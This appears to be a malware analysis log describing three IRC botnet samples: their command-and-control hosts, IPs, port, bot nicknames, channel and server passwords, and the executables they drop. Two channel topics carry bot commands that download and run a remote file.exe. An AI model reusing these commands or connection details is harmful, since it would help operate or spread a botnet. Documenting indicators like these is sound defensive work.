Botnet C&C irc
login.ipwhois.co.uk DNS_TYPE_A 92.241.165.230 92.241.164.101 92.241.164.102
login.ipwhois.co.uk:47221
Nick: :{00-AUS-XP-pc7-6970}
Username: blaze
Server Pass: weed
Joined Channel: #crimbot-esp
Channel Topic for Channel #crimbot-esp: “.enable http://rapidshare.com/files/415120355/file.exe 1”
Private Message to User {iNF-00-AUT-XP-pXxa1@: “20.5kb downloaded to C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tempfile66347.exe (20.5kbps)”
Process Created
C:\WINDOWS\winusbservice.exe
Botnet C&C irc
login.ipwhois.co.uk DNS_TYPE_A 92.241.164.101 92.241.164.102 92.241.165.230
login.ipwhois.co.uk:47221
Nick: AUS|XP|pc2|269032
Username: bubqfli
Joined Channel: #hbot-buy
Joined Channel: #uobg-ohl
Channel Topic for Channel #hbot-buy: “.foobar http://rapidshare.com/files/415120355/file.exe 1”
Private Message to Channel #hbot-buy: “.:[uptdate]:. File download: 20.5KB to: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\eraseme_00134.exe @ 20.5KB/sec.”
Process Created
C:\Documents and Settings\Administrator\Application Data\jusched.exe
Domain C&C irc
addr: login.ipwhois.org.uk ip: 92.241.165.230
addr: login.ipwhois.org.uk ip: 92.241.164.102
login.ipwhois.org.uk:47221
User Name: 2293361022
Real Name: HOME-OFF-D5F0AC
Password: letmein
Nick Name: N|USA|M2|0|XP|474739079
Channel: ##NN-new
Password: nn
Process Created
C:\WINDOWS\system32\wmsrvc.exe